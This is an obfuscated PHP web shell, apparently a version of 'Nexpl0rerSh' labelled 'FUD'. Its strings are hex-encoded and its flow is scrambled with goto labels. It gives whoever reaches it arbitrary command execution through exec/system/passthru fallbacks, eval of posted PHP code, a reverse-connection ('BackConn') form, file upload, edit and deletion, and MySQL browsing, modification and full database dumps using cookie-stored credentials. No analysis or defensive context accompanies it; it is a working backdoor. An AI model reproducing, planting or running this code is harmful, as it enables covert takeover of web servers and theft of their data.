"\x22\40\x73\151\x7a\x65\x3d\42\x33\x30\42\76\xa\74\x69\156\160\x75\164\40\x74\x79\x70\145\x3d\x73\x75\x62\x6d\151\x74\40\x76\x61\154\x75\x65\x3d\x44\165\x6d\x70\104\x62\x3e\x3c\x2f\146\x6f\162\x6d\76\74\x66\157\162\155\x20\x6e\x61\x6d\145\75\42\x75\x70\x64\141\164\145\42\x20\x6d\145\164\x68\157\x64\75\x70\x6f\x73\x74\40\x61\143\x74\x69\157\156\75\43\x3e\74\151\x6e\x70\165\x74\40\164\171\160\x65\75\x68\x69\x64\144\145\x6e\40\156\141\155\145\75\x6d\x6f\x64\x65\x20\x76\x61\154\x75\x65\75\165\160\x64\141\164\x65\x3e\x3c\x69\156\160\x75\x74\x20\x74\x79\160\x65\x3d\x68\151\x64\x64\145\x6e\40\x6e\x61\x6d\x65\x3d\x63\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x73\76\x3c\x69\x6e\160\165\x74\40\x74\x79\x70\145\75\150\151\144\x64\145\x6e\x20\x6e\x61\155\145\x3d\x74\141\x62\x6c\x65\x3e\74\57\x66\157\x72\x6d\x3e\12\12\74\x74\x61\x62\x6c\145\40\167\x69\144\x74\x68\75\x22\x31\x30\x30\x25\42\x20\142\x6f\x72\144\x65\162\x3d\x22\61\42\x20\x63\145\x6c\x6c\x73\x70\141\x63\x69\156\147\75\x22\60\x22\x20\143\x65\154\154\160\x61\x64\144\151\x6e\147\x3d\x22\x30\42\x3e\xa\x3c\164\162\76\12\74\164\144\40\x77\x69\x64\164\150\x3d\x33\x30\x25\40\166\x61\x6c\x69\x67\156\x3d\164\157\x70\x3e\xa\74\x74\x61\142\154\145\40\167\x69\x64\x74\150\75\42\x31\60\60\x25\42\40\x62\x6f\x72\x64\x65\162\75\x22\x31\42\40\143\145\x6c\x6c\163\x70\141\143\x69\x6e\147\75\x22\60\x22\40\x63\145\154\154\160\141\144\144\x69\x6e\147\x3d\x22\x30\x22\x3e\xa\40\xa\40\40\x3c\x2f\x74\x72\76\12\x20\40\74\164\x72\x3e\12\40\40\40\x20\74\x74\x64\x3e\74\143\x65\x6e\x74\145\x72\76\x2d\x2d\133\40\x54\x61\x62\x6c\x65\x20\x4c\151\x73\164\40\x5d\x2d\55\x3c\57\x63\145\x6e\164\145\162\76\40\x3c\x2f\164\x64\x3e\xa\40\40\74\57\164\x72\76"; $q = mysql_query("\x53\110\x4f\x57\40\124\x41\x42\x4c\105\123") or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $output .= "\x3c\164\162\76\xa\40\40\x20\40\74\x74\144\x3e\x3c\143\x65\156\x74\x65\162\x3e\x3c\x61\40\x63\x6c\141\163\163\x3d\42\154\x69\x6e\x6b\x22\x20\150\162\145\x66\x3d\x22\x6a\x61\166\x61\163\143\162\151\160\x74\72\144\x6f\x63\x75\x6d\145\x6e\x74\x2e\x74\x61\x62\154\145\x2e\161\x75\145\x72\x79\x2e\166\x61\x6c\x75\x65\75\x27\123\x45\x4c\x45\x43\124\x20\x2a\40\106\122\x4f\x4d\x20" . $table[0] . "\47\x3b\144\157\x63\x75\155\145\x6e\164\56\164\x61\142\x6c\x65\x2e\x73\x75\142\155\151\x74\50\x29\73\x22\x3e" . $table[0] . "\x3c\57\141\x3e\x3c\x2f\x63\145\156\x74\x65\162\x3e\x3c\x2f\164\x64\76\12\40\x20\74\57\164\x72\x3e"; } $output .= "\12\74\57\x74\x61\142\x6c\x65\76\x3c\x2f\x74\144\76\12\12\74\x74\144\40\x77\151\144\164\150\x3d\42\67\x30\x25\42\40\x76\x61\x6c\151\147\156\75\x22\x74\x6f\x70\x22\x3e\12\74\164\141\x62\x6c\145\x20\167\151\144\x74\150\75\42\61\60\60\45\42\x20\142\x6f\x72\144\x65\162\75\42\61\42\x20\x63\x65\154\x6c\x73\160\141\x63\151\x6e\x67\75\42\60\x22\40\x63\x65\x6c\154\x70\141\144\144\x69\156\x67\75\x22\60\42\x3e\xa\x20\x20\74\x74\x72\x3e\xa\x20\x20\40\40\x3c\164\x64\76\x3c\x63\x65\x6e\164\x65\162\x3e\x2d\55\133\40\x51\x75\145\x72\x79\40\x52\145\x73\x75\x6c\164\40\x5d\55\x2d\x3c\x2f\143\x65\156\x74\145\x72\76\x20\x3c\57\x74\144\x3e\xa\x20\40\74\x2f\164\162\x3e\xa\40\40\x3c\164\x72\76\x3c\x74\144\x3e\x3c\x74\141\142\154\x65\x20\143\145\x6c\154\x53\x70\141\143\151\x6e\x67\75\x30\40\x62\157\162\x64\x65\162\103\157\154\x6f\x72\x44\141\162\x6b\x3d\x23\66\66\x36\x36\66\x36\x20\x63\x65\154\154\120\141\x64\144\x69\156\147\x3d\65\x20\167\151\144\x74\150\x3d\x22\61\45\x22\40\x62\147\x43\157\x6c\x6f\x72\x3d\x23\x30\60\60\60\x30\60\x20\x62\157\x72\x64\x65\162\103\157\x6c\x6f\162\114\x69\147\150\164\x3d\43\x63\x30\143\60\x63\x30\x20\142\x6f\162\144\x65\162\x3d\x31\x3e\74\164\x72\76\xa\x20\40\40"; $output .= "\74\164\x64\x3e\46\x6e\x62\163\x70\73\74\57\164\x64\x3e\xa"; foreach ($pars as $par) { $output .= is_numeric($par) || $par == '' ? '' : "\x3c\x74\x64\x3e" . $par . "\x3c\57\x74\144\x3e\xa"; } $output .= "\x3c\57\164\x72\76"; mysql_data_seek($query, 0); while ($row = mysql_fetch_array($query, MYSQL_ASSOC)) { $w = ''; $i = 0; foreach ($row as $k => $v) { $name = mysql_field_name($query, $i); $w .= "\40\140" . $name . "\140\40\75\x20\x5c\x27" . addslashes($v) . "\134\x27\x20\101\x4e\x44"; $i++; } if (count($row) > 0) { $w = substr($w, 0, strlen($w) - 3); } if ($table_name == "\x6d\x79\x62\142\137\x75\x73\145\162\163") { $w = "\x20\165\x69\x64\x3d\x5c\x27" . $row["\165\151\144"] . "\x5c\x27\40"; } if ($table_name == "\160\150\160\x62\x62\x5f\x75\x73\145\162\163") { $w = "\x20\x75\163\145\162\137\x69\x64\x3d\134\47" . $row["\x75\163\145\162\x5f\x69\x64"] . "\x5c\47\x20"; } $output .= "\x3c\x74\162\x3e"; $output .= "\x3c\x74\144\x3e\x3c\x61\40\143\x6c\x61\163\163\x3d\x22\154\151\x6e\x6b\42\x20\150\162\x65\146\x3d\42\x6a\141\166\141\163\x63\162\x69\x70\164\72\144\x6f\143\x75\x6d\x65\156\x74\56\x75\x70\x64\x61\x74\145\56\143\157\156\144\151\164\x69\x6f\x6e\x73\x2e\x76\141\x6c\x75\145\75\x27" . urlencode($w) . "\47\x3b\x64\157\143\x75\155\x65\x6e\x74\x2e\x75\160\144\141\x74\x65\56\x74\x61\x62\154\145\56\166\141\x6c\165\x65\x3d\47" . $table_name . "\x27\73\x64\x6f\x63\x75\x6d\145\x6e\164\56\165\x70\144\141\164\x65\56\163\x75\142\x6d\x69\x74\x28\x29\73\x22\76\74\x69\x6d\x67\x20\163\x72\143\75\x22" . $_SERVER["\120\110\120\137\123\x45\114\x46"] . "\x3f\x61\x63\164\x3d\151\x6d\x67\x26\x69\155\147\75\143\x68\141\156\x67\145\42\x20\x62\x6f\x72\144\x65\x72\x3d\x30\40\57\x3e\74\57\141\x3e\74\141\40\x63\154\x61\163\x73\x3d\x22\x6c\151\156\153\x22\40\150\x72\145\x66\x3d\x22\x6a\x61\x76\x61\163\143\162\x69\160\x74\72\144\157\143\x75\155\x65\156\x74\56\x74\x61\x62\154\145\x2e\161\x75\145\162\171\56\166\x61\x6c\165\145\x3d\47" . urlencode("\104\x45\x4c\105\124\x45\40\x46\x52\117\115\40\x60" . $table_name . "\140\x20\127\110\x45\x52\105" . $w . "\114\x49\115\x49\x54\40\x31") . "\x27\x3b\144\x6f\x63\x75\155\145\156\164\x2e\164\x61\142\154\145\x2e\x73\165\x62\155\151\164\x28\51\x3b\x22\x3e\x3c\151\x6d\x67\40\163\x72\143\75\x22" . $_SERVER["\120\110\x50\137\x53\x45\114\106"] . "\x3f\141\143\164\75\x69\155\147\46\x69\x6d\x67\x3d\x64\x65\154\x65\164\145\x22\40\142\157\162\144\145\162\75\x30\x20\x2f\76\x3c\x2f\141\x3e\74\x2f\164\144\x3e\xa"; foreach ($row as $pardd => $rowval) { if (!is_numeric($pardd) && !empty($pardd)) { if ($row[$pardd] == '') { $output .= "\x3c\x74\x64\76\x3c\x66\x6f\156\164\x20\143\x6f\x6c\x6f\x72\x3d\x67\x72\x65\145\156\76\x3c\x62\x3e\116\125\114\x4c\74\57\142\x3e\x3c\57\146\157\156\x74\x3e\74\x2f\164\144\76"; } else { $output .= "\x3c\164\144\x3e" . $row[$pardd] . "\74\57\x74\x64\76"; } } } $output .= "\x3c\x2f\164\162\x3e"; } $output .= "\12\x20\40\40\x20\x3c\57\164\141\142\154\145\x3e\74\x2f\x74\144\76\xa\x20\40\74\x2f\x74\x72\x3e\xa\x20\x20\x3c\57\164\141\x62\x6c\x65\76\x3c\150\162\40\163\x69\x7a\x65\75\42\x31\x22\40\156\x6f\163\150\141\x64\x65\x3e\74\x62\162\76"; } goto qVmmY; viyX4: $percentfree = round($freespace * 100 / $totalspace); goto bYNNj; PGCay: if ($_POST["\155\x6f\x64\x65"] == "\144\x65\x6c\x66\151\154\145") { $dir == realpath("\x2e") ? $file = $_POST["\144\x65\x6c\146\151\x6c\145"] : ($file = $dir . $_POST["\144\145\x6c\146\151\154\x65"]); unlink($file) or die("\x3c\x66\x6f\x6e\x74\x20\143\157\154\157\x72\75\x72\x65\144\76\x45\x72\x72\x6f\162\72\40\143\x61\156\x6e\x6f\x74\40\x64\145\x6c\x65\x74\145\x20\x66\151\154\x65\74\x2f\146\157\156\164\x3e"); $output .= "\x46\151\x6c\145\x20\x64\145\x6c\x65\164\145\x64\56"; } goto az06a; bOCOh: if ($_POST["\x6d\x6f\x64\145"] == "\x64\x6f\x65\x64\151\x74") { $dir == realpath("\56") ? $file = $_POST["\x6d\157\x64\146\x69\154\145"] : ($file = $dir . $_POST["\155\x6f\144\146\151\x6c\x65"]); $output .= $file . "\x3c\142\162\40\57\x3e"; $fh = fopen($file, "\x77\x2b") or die("\74\x66\157\156\164\40\143\157\154\x6f\x72\75\162\x65\x64\76\x45\x72\x72\x6f\162\x3a\x20\143\x61\156\156\x6f\x74\x20\157\x70\145\x6e\40\x66\151\x6c\145\74\x2f\x66\157\156\164\76"); $_POST["\156\145\x77\x74\x65\170\x74"] = ini_get("\155\x61\147\x69\x63\x5f\x71\x75\157\x74\145\163\x5f\x67\160\x63") ? stripslashes($_POST["\156\x65\x77\x74\145\170\164"]) : $_POST["\x6e\x65\x77\164\145\x78\x74"]; fwrite($fh, $_POST["\156\x65\x77\164\145\170\164"]) or die("\x3c\x66\157\x6e\164\x20\143\x6f\154\x6f\x72\75\x72\x65\x64\76\105\162\162\x6f\162\x3a\40\x63\141\x6e\x6e\157\164\x20\167\162\x69\x74\x65\40\164\157\x20\x66\x69\x6c\145\x3c\x2f\x66\x6f\156\x74\76"); fclose($fh); $output .= "\x44\x6f\x6e\145\x2e"; } goto vEqeH; MDzli: ?>
";
</script>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td style="border:#FFFFFF 1px solid;"><form name=fedit action=# method=post>
<div align="center"> <strong>:: Edit file :: </strong><br>
<input type=hidden name=mode value=edit>
name
<input type=text name=modfile size="12">
<input type=submit value=edit>
</div></form></td>
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
<div align="center"><strong>:: Make File ::</strong><br />
<input type=hidden name=mode value=mkfile>
name
<input type=text name='mkfile' size="12">
<input name="submit" type=submit value=make>
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"> <form action=# name='delfile' method=post>
<div align="center"><strong>:: Delete File :: </strong><br>
<input type=hidden name=mode value=delfile>
name
<input type=text name='delfile' size="12">
<input type=submit value=unlink>
</div>
</form> </td>
</tr>
<tr>
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#" enctype="multipart/form-data">
<div align="center"><strong>:: upload :: </strong><br>
<input type="hidden" name="mode" value="upload2" />
<input name="myfile" type="file" id="myfile" value="Load..." size="20" />
<input type="submit" name="ok" value="do" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
<div align="center"><strong>:: Rename File :: </strong><br>
<input type="hidden" name="mode" value="renfile" />
<input type="text" name="oldname" value="0ld name" size="15" />
<input type="text" name="newname" value="New name" size="15" />
<input name="submit" type="submit" value="Ren" />
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post">
<div align="center"><strong>:: Make Dir :: </strong><br>
<input type="hidden" name="mode" value="mkdir" />
name
<input name="mkdir" type="text" size="18" />
<input name="submit" type="submit" value="ok" />
</div>
</form> </td>
</tr>
<tr>
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
<div align="center"><strong>:: Cmd Execution :: </strong><br>
<input type=hidden name=mode value=cmd>
<input name=cmd size="26" tpye=text>
<input name="submit" type=submit value=exec>
</div>
</form> </td>
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post">
<div align="center"><strong>:: BackConn :: </strong><br>
<input type=hidden name=mode value=reverse />
<input name="ip" type="text" value="<?php goto YW3ht; n9akO: ?>
( <?php goto p9VuD; svfxX: echo addslashes(realpath("\x2e")); goto gL0Qn; uHiaa: if ($_POST["\x6d\157\x64\145"] == "\x64\165\x6d\x70\137\144\x62") { $dump = "\43\x20\x44\x75\155\x70\145\144\40\x62\x79\x20\116\x65\170\x70\x6c\x30\x72\145\x72\x53\x68\x20\63\56\61\x20\106\x55\104\x20\122\x65\x6c\145\141\x73\145\40\12"; $dump .= "\x23\x20\115\171\123\x51\x4c\40\166\x65\162\163\151\x6f\156\72\40\x28" . @mysql_get_server_info() . "\x29\x20\x72\x75\x6e\x6e\x69\156\x67\40\157\x6e\x20" . getenv("\x53\x45\122\x56\x45\x52\137\101\x44\104\x52") . "\x20\x28" . getenv("\123\x45\x52\x56\105\x52\137\x4e\x41\x4d\105") . "\x29\x20\xa"; $dump .= "\43\40\x44\141\x74\x61\x62\x61\163\145\x3a\x20" . $_POST["\144\142\156\141\x6d\x65"] . "\12"; $dump .= "\x23\x20" . $_COOKIE["\x6d\171\163\x71\154\x5f\x75\x73\x65\x72"] . "\72" . $_COOKIE["\155\171\x73\x71\x6c\x5f\x70\x61\163\x73"] . "\100" . $_COOKIE["\x6d\171\163\161\x6c\x5f\x68\x6f\x73\x74"] . "\12"; $db = $_POST["\144\142\x6e\141\x6d\145"]; setcookie("\x6d\171\163\x71\x6c\x5f\x6e\141\x6d\145", $db); $link = mysql_connect($_COOKIE["\x6d\x79\x73\161\x6c\x5f\150\157\x73\164"], $_COOKIE["\x6d\x79\163\x71\x6c\x5f\165\163\145\x72"], $_COOKIE["\x6d\171\x73\x71\x6c\x5f\160\141\163\x73"]) or die(mysql_error()); isset($_POST["\144\142\156\x61\155\145"]) ? mysql_select_db($_POST["\x64\142\156\x61\x6d\145"]) : (print ''); $q = mysql_query("\x53\110\x4f\x57\40\x54\x41\x42\114\105\123") or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $dump .= datadump($table[0]); } $file_name = $db . "\137\x64\165\x6d\x70\x5f" . date("\144\x5f\x4d\x5f\x59") . "\137\x4e\145\170\x70\x6c\60\x72\145\162\56" . sql; chdir($dir); $fp = fopen($file_name, "\x77\53"); fwrite($fp, $dump); fclose($fp); $output .= "\104\x75\155\160\x20\163\141\166\x65\144\x20\x69\156\x20" . $dir; } goto lNz2p; kwJny: $pd = $e = explode(DIRECTORY_SEPARATOR, substr($dir, 0, -1)); goto MmW5c; S0MVT: foreach ($pd as $b) { $t = ''; $j = 0; foreach ($e as $r) { $t .= $r . DIRECTORY_SEPARATOR; if ($j == $i) { break; } $j++; } echo "\74\141\x20\x63\x6c\141\x73\163\x3d\42\154\x69\156\x6b\x22\x20\150\162\x65\x66\75\42\x6a\x61\166\x61\163\143\162\151\x70\164\x3a\x64\x6f\x63\x75\155\145\156\x74\56\x66\x6f\154\x64\145\162\x2e\x64\x69\162\56\x76\141\x6c\x75\145\x3d\47" . urlencode(addslashes($t)) . "\47\73\x64\157\x63\165\155\145\156\164\56\x66\x6f\x6c\x64\x65\x72\x2e\163\x75\x62\155\151\164\x28\x29\73\x22\x3e\74\x62\76" . htmlspecialchars($b) . DIRECTORY_SEPARATOR . "\x3c\57\x62\76\74\x2f\x61\x3e"; $i++; } goto m_EEw; ZtUEj: if ($_POST["\155\157\x64\145"] == "\x65\166\x61\x6c") { chdir($dir); eval(stripslashes($_POST["\145\166\141\154"])); die; } goto WM1_5; AM3A5: echo $reglobals; goto jzfaJ; MmW5c: $i = 0; goto S0MVT; qVmmY: if ($_POST["\x6d\157\x64\x65"] == "\165\160\x64\141\164\145") { $link = mysql_connect($_COOKIE["\x6d\x79\x73\161\154\x5f\150\157\x73\164"], $_COOKIE["\x6d\171\163\161\154\137\165\163\145\162"], $_COOKIE["\x6d\x79\x73\x71\154\x5f\x70\141\163\163"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["\155\171\163\161\154\137\x6e\x61\155\145"]); $conditions = urldecode(stripslashes($_POST["\x63\x6f\x6e\144\151\164\151\x6f\156\163"])); $table = $_POST["\x74\141\142\154\x65"]; $select = mysql_query("\123\x45\114\105\x43\124\x20\52\x20\x46\x52\117\115\40{$table}\40\x57\x48\x45\x52\x45{$conditions}\x4c\x49\x4d\x49\124\x20\x31") or die(mysql_error()); $output .= "\xa\74\x66\157\162\x6d\x20\151\x64\75\42\164\x61\142\x6c\145\42\x20\156\x61\155\145\75\x22\164\141\x62\x6c\145\42\40\x6d\x65\x74\150\157\144\75\x22\x70\x6f\x73\x74\x22\x20\x61\x63\x74\151\157\156\x3d\42\x23\42\76\74\x69\x6e\x70\x75\x74\x20\164\x79\160\x65\75\150\151\x64\x64\x65\x6e\x20\x6e\141\x6d\x65\75\155\x6f\x64\145\40\166\141\154\x75\x65\x3d\x73\x71\154\x5f\161\165\145\162\x79\40\57\x3e\12\x20\12\x20\40\74\151\x6e\160\165\164\40\x6e\141\x6d\x65\75\x22\161\165\x65\x72\x79\42\40\x74\x79\160\x65\75\42\164\145\x78\x74\x22\40\x69\144\x3d\x22\x71\x75\x65\162\171\42\40\x73\151\x7a\x65\x3d\x22\65\60\42\x20\x76\141\x6c\x75\x65\75\x22\123\105\114\105\103\124\x20\x2a\x20\106\x52\117\x4d\40\164\141\x62\x6c\145\137\x6e\141\x6d\145\42\40\x2f\76\xa\x20\x20\74\x69\x6e\x70\x75\164\x20\x74\x79\160\145\x3d\42\163\165\142\x6d\151\164\42\x20\156\x61\155\x65\x3d\42\x53\x75\142\x6d\151\164\x22\40\x76\x61\154\165\x65\75\42\121\165\145\162\x79\42\40\57\76\12\x3c\57\x66\x6f\x72\155\76\74\x66\157\x72\155\x20\x61\143\x74\151\x6f\x6e\75\43\40\155\x65\x74\x68\x6f\x64\75\160\x6f\163\164\76\x3c\x69\156\x70\165\164\40\x74\x79\160\x65\x3d\x68\151\x64\144\145\156\x20\x6e\141\x6d\145\x3d\x6d\157\x64\x65\40\x76\141\154\x75\x65\x3d\144\165\x6d\160\x5f\144\142\76\74\x69\x6e\160\x75\x74\40\x6e\141\x6d\x65\x3d\144\142\x6e\141\x6d\x65\x20\x74\171\x70\x65\75\x74\x65\x78\x74\x20\166\x61\154\x75\x65\75\x22" . $_COOKIE[mysql_name] . "\x22\x20\x73\151\172\145\75\x22\x33\x30\x22\76\xa\x3c\151\156\160\165\164\x20\x74\x79\160\x65\75\163\165\142\155\x69\x74\40\x76\141\x6c\x75\x65\x3d\104\x75\x6d\x70\x44\142\x3e\74\x2f\x66\157\x72\155\x3e\x3c\x66\157\x72\x6d\x20\x6e\141\x6d\145\x3d\42\165\x70\144\141\164\145\42\x20\x6d\x65\164\150\157\x64\75\160\157\163\x74\x20\x61\143\164\151\157\x6e\75\43\76\74\151\156\160\165\164\x20\x74\171\160\145\75\150\x69\144\x64\x65\156\x20\156\x61\155\x65\75\x6d\157\x64\x65\40\x76\x61\x6c\165\145\75\x75\160\144\141\164\x65\76\74\x69\x6e\x70\x75\164\40\164\x79\x70\145\75\x68\151\x64\144\x65\156\40\156\x61\x6d\145\75\143\x6f\156\144\151\164\x69\157\156\x73\x3e\74\x69\156\160\x75\164\40\164\x79\x70\x65\75\x68\151\x64\x64\145\156\40\x6e\x61\155\145\x3d\x74\x61\x62\x6c\x65\76\x3c\57\x66\x6f\162\x6d\x3e\12\12\74\164\x61\142\154\x65\40\167\x69\144\164\x68\x3d\42\61\x30\x30\x25\42\40\x62\157\162\x64\145\x72\x3d\x22\x31\x22\x20\x63\145\154\154\163\x70\141\x63\151\156\147\75\42\x30\42\40\x63\x65\154\154\160\x61\x64\x64\x69\x6e\147\75\x22\x30\42\76\xa\74\x74\162\76\xa\74\x74\144\x20\167\x69\x64\164\x68\x3d\x33\x30\x25\40\166\141\154\x69\x67\156\x3d\x74\157\160\76\12\74\164\141\142\154\145\40\167\x69\x64\164\150\x3d\x22\61\x30\60\45\x22\40\142\x6f\x72\x64\x65\x72\75\42\x31\x22\40\143\145\154\x6c\x73\160\141\143\151\156\147\x3d\42\x30\42\40\x63\145\154\x6c\160\x61\144\144\151\x6e\147\x3d\x22\60\x22\76\12\40\xa\x20\40\x3c\57\164\162\76\12\x20\40\74\164\162\x3e\xa\x20\x20\40\40\x3c\x74\144\76\74\143\x65\x6e\x74\145\x72\76\x2d\55\133\40\124\141\142\x6c\145\x20\114\x69\163\164\x20\135\x2d\x2d\x3c\x2f\x63\x65\x6e\x74\x65\x72\76\40\74\57\164\144\x3e\xa\x20\x20\74\x2f\x74\162\76"; $q = mysql_query("\123\110\117\127\40\124\x41\102\x4c\x45\x53") or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $output .= "\74\164\x72\x3e\xa\40\40\40\x20\74\164\x64\76\74\143\145\x6e\164\x65\162\x3e\74\x61\x20\x63\x6c\x61\163\x73\75\x22\154\x69\x6e\153\42\40\150\162\x65\x66\75\42\152\141\166\x61\x73\143\x72\x69\x70\x74\72\x64\x6f\x63\x75\x6d\145\x6e\x74\x2e\164\x61\x62\154\x65\56\161\165\145\x72\x79\x2e\x76\141\x6c\165\145\x3d\x27\123\x45\x4c\105\x43\124\x20\x2a\x20\x46\122\117\115\40" . $table[0] . "\47\73\144\x6f\143\x75\x6d\145\x6e\164\56\164\141\x62\154\x65\56\x73\x75\142\x6d\151\164\50\x29\x3b\x22\76" . $table[0] . "\x3c\57\x61\76\x3c\57\x63\145\156\x74\145\162\76\74\57\x74\x64\76\xa\40\40\x3c\57\x74\162\76"; } $output .= "\12\74\57\164\141\142\x6c\x65\76\x3c\57\x74\144\x3e\12\12\x3c\164\144\40\x77\151\x64\x74\150\75\x22\x37\60\x25\42\40\166\141\154\x69\147\156\75\x22\164\x6f\x70\x22\76\12\74\164\141\x62\154\x65\x20\x77\x69\x64\x74\x68\75\42\61\60\x30\45\x22\x20\142\x6f\x72\144\x65\x72\75\42\x31\x22\x20\143\x65\154\154\x73\160\x61\143\151\156\147\x3d\x22\60\42\x20\143\145\x6c\x6c\160\141\x64\144\x69\x6e\147\x3d\42\x30\42\76\12\40\40\74\164\x72\76\12\x20\x20\40\40\x3c\164\x64\x3e\x3c\143\145\x6e\164\145\162\76\55\x2d\x5b\40\121\x75\x65\162\171\x20\x52\145\163\165\x6c\164\40\x5d\x2d\55\x3c\x2f\x63\x65\156\164\x65\162\76\x20\x3c\x2f\164\144\x3e\xa\x20\x20\74\57\164\x72\76\12\40\40\x3c\x74\x72\76\74\164\x64\76\74\146\157\162\155\40\141\143\x74\x69\157\x6e\x3d\43\40\x6d\145\x74\x68\157\144\x3d\160\157\163\164\76\xa\x3c\151\x6e\x70\x75\164\x20\164\171\160\x65\75\150\x69\x64\x64\145\156\40\x6e\x61\x6d\x65\x3d\x6d\157\144\x65\x20\x76\x61\x6c\x75\145\75\165\x70\144\141\x74\145\62\76\12\x3c\x74\141\x62\154\145\40\x63\x65\x6c\154\123\160\x61\x63\151\x6e\147\x3d\60\40\142\157\162\x64\145\x72\103\x6f\x6c\x6f\162\x44\141\162\x6b\x3d\x23\x36\66\x36\x36\66\66\x20\x63\145\x6c\154\x50\x61\144\144\x69\x6e\147\x3d\x35\40\x77\x69\x64\164\150\x3d\42\x31\x25\42\40\x62\147\x43\x6f\x6c\x6f\x72\75\x23\60\x30\x30\x30\60\60\x20\x62\157\162\144\x65\162\x43\157\x6c\x6f\x72\114\151\x67\x68\164\x3d\x23\x63\60\x63\60\143\60\x20\x62\157\x72\x64\145\x72\75\x31\76\12"; while ($row = mysql_fetch_array($select, MYSQL_ASSOC)) { foreach ($row as $k => $v) { $output .= "\74\x74\x72\76\74\164\x64\76{$k}\74\57\164\144\76\x3c\x74\144\x3e\74\151\156\160\x75\164\x20\164\171\x70\x65\75\164\145\170\x74\40\156\x61\x6d\x65\75\x27{$k}\47\x20\x76\141\154\x75\x65\x3d\47{$v}\47\76\x3c\57\x74\144\x3e\x3c\x2f\164\162\76"; } } $output .= "\xa\x3c\x2f\x74\141\x62\154\x65\76\74\151\x6e\x70\x75\164\40\164\171\160\x65\75\150\x69\144\x64\145\156\x20\156\141\x6d\145\75\164\x61\x62\154\145\40\166\x61\x6c\165\x65\75\42" . $_POST["\164\x61\142\x6c\145"] . "\x22\76\x3c\x69\156\160\x75\x74\x20\164\171\x70\145\x3d\x68\x69\x64\144\145\x6e\x20\x6e\141\x6d\145\x3d\x63\157\x6e\x64\x69\x74\x69\x6f\156\163\x20\166\141\x6c\165\x65\75\x22" . $_POST["\143\157\x6e\144\x69\x74\151\157\156\163"] . "\x22\76\74\x69\156\x70\x75\x74\40\164\x79\160\x65\75\x73\165\142\x6d\x69\x74\x20\166\x61\154\165\x65\75\x55\160\144\141\x74\145\x3e\74\x2f\x66\157\162\x6d\x3e\74\x2f\x74\144\x3e\74\57\x74\162\x3e\74\x2f\164\141\x62\x6c\145\76\x3c\57\164\x64\x3e\12\x20\x20\74\x2f\x74\162\76\xa\x20\x20\74\x2f\164\141\142\x6c\145\76\12"; } goto x1YkZ; ngXCB: function exa($cfe) { $res = ''; if (!empty($cfe)) { if (function_exists("\x65\170\x65\x63")) { @exec($cfe, $res); $res = join("\xa", $res); } elseif (function_exists("\x73\150\x65\x6c\154\x5f\x65\x78\145\143")) { $res = @shell_exec($cfe); } elseif (function_exists("\x73\x79\163\x74\145\155")) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (function_exists("\x70\x61\163\163\x74\x68\x72\x75")) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (@is_resource($f = @popen($cfe, "\162"))) { $res = ''; while (!@feof($f)) { $res .= @fread($f, 1024); } @pclose($f); } } return $res; } goto ogY64; wgueM: echo $_SERVER["\123\x45\x52\126\105\122\x5f\x41\104\x44\x52"]; goto c0I31; oNJrc: echo $gpc; goto vLfEF; KnCOR: function whicha($pr) { $path = exa("\x77\x68\151\x63\150\x20{$pr}"); if (!empty($path)) { return $path; } else { return $pr; } } goto ngXCB; jzfaJ: echo $current_user; goto jTav2; NXSQq: if ($_POST["\155\157\144\x65"] == '') { $_POST["\155\x6f\144\x65"] = "\x6c\x73"; } goto ctnEe; I41_y: $reglobals_on_msg = "\74\146\x6f\156\164\x20\143\x6f\x6c\x6f\x72\x3d\147\x72\145\145\156\x3e\x52\x65\147\151\x73\164\x65\162\x20\107\154\157\142\141\154\x73\x3a\x20\x4f\x4e\74\57\146\157\x6e\164\76\74\x62\162\40\x2f\x3e"; goto apvn8; wJg_X: echo $totalspace; goto feQhy; UDURP: ?>
" size="9" />
<input type="text" size="10" name="pass" value="<?php goto Sx0I4; QKbCa: ?>
<?php goto oNJrc; XmImr: $freespace = disk_free_space($dir); goto bsTlP; XBp7x: $totalspace .= "\x20\x47\x42"; goto LoEfa; G8yfz: echo $error; goto A5MIx; KDbB3: if ($_POST["\144\151\x72"] == '') { if ($_COOKIE["\144\151\162"] == '') { $dir = realpath("\56"); } else { $d = str_replace("\x5c", DIRECTORY_SEPARATOR, $_COOKIE["\144\x69\162"]); $d = str_replace("\134\134", "\134", $_COOKIE["\144\x69\x72"]); $dir = $d; } } else { $dir = str_replace("\x5c", DIRECTORY_SEPARATOR, $_POST["\x64\151\x72"]); $d = str_replace("\x5c\134", "\x5c", $_POST["\144\x69\162"]); setcookie("\x64\151\162", $dir); } goto lm7Nb; rRUEz: if ($_GET[act] == "\151\155\147") { header("\x43\x6f\156\x74\x65\156\164\x2d\x74\x79\x70\145\x3a\40\x69\x6d\141\x67\145\57\x67\151\x66"); header("\x43\x61\143\x68\145\55\143\157\156\164\162\157\x6c\x3a\x20\160\165\x62\x6c\x69\143"); header("\x45\x78\x70\x69\x72\x65\x73\x3a\40" . date("\162", mktime(0, 0, 0, 1, 1, 2030))); header("\103\x61\143\x68\145\x2d\x63\x6f\156\164\162\x6f\x6c\72\40\155\x61\170\55\141\147\145\x3d" . 60 * 60 * 24 * 7); header("\x4c\141\163\x74\55\115\157\144\x69\146\x69\x65\x64\x3a\x20" . date("\162", filemtime(__FILE__))); $image = $images[$_GET["\151\x6d\147"]]; echo base64_decode($image); die; } goto Aqdh7; feQhy: ?>
